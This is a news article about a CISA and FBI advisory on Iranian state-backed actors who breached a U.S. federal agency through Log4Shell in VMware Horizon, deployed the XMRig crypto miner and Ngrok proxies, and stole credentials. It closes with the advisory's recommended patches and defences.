U.S. security agencies on Wednesday revealed that Iranian government-sponsored threat actors breached the server of a federal agency in February and installed crypto-mining malware on its systems.
In an advisory, the U.S. Cybersecurity and Information Security Agency (CISA) said it conducted “an incident response engagement” with the Federal Bureau of Investigation (FBI) in June/July to fix the bug and restrict unauthorized access.
The threat actor exploited the Log4Shell vulnerability in an unpatched VMware Horizon server to breach the agency, CISA said.
The threat actor did not only install crypto-mining malware on the compromised system, but also moved laterally within the network, swiped credentials, and implanted reverse proxies.
CISA and the FBI urged all U.S. organizations to install the latest updates for their systems and take other steps it laid out to improve their cybersecurity defenses.
Hackers Had Access for Several Months
The advisory did not identify the agency but said it was a civilian organization.
CISA said it first detected the intrusion in April while conducting retrospective analysis using EINSTEIN (CISA’s intrusion detection system). Further investigation showed that the actors compromised the affected agency in February 2022.
“In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” the advisory reads.
The advisory contains a list of recommendations for organizations to protect against similar attacks. CISA also lays out how organizations can test their systems to see if they hold up against the techniques the attackers used to breach the unidentified agency.
Iranian authorities are yet to comment on the story. It is unclear if the breach exposed any confidential information that may threaten the security of the affected federal agency and U.S. citizens.
About the Log4ShellVulnerability
Log4Shell is a zero-day vulnerability affecting Apache Software Foundation’s ubiquitous Java logging library. The Apache Foundation first announced the Log4j vulnerability in December last year. At the time, it was categorized as a critical threat and received a full base score of 10 out of 10 on the National Vulnerability Database.
The vulnerability contributed to a record number of cyber attacks in 2021.
In their joint advisory, CISA and the FBI said that any organization that did not immediately apply patches available or workarounds should assume their network has been compromised. They advised such organizations to initiate threat-hunting activities.
And, if an organization detects a breach, they ought to assume the threat actor has moved laterally. Therefore, such organizations should investigate all connected systems, including domain controllers, and audit privileged accounts.
The mitigatory best practices laid out in the advisory include:
- Installing updated builds to ensure affected VMware Horizon and UAG systems run on the latest version
- Keeping all software up to date
- Minimizing their internet-facing attack surface
- Using best practices for identity and access management (IAM), such as phishing-resistant MFA
- Enforcing better domain control systems
- Creating a deny list of credentials that are known to be compromised
- Restricting where accounts and credentials can be used to secure credentials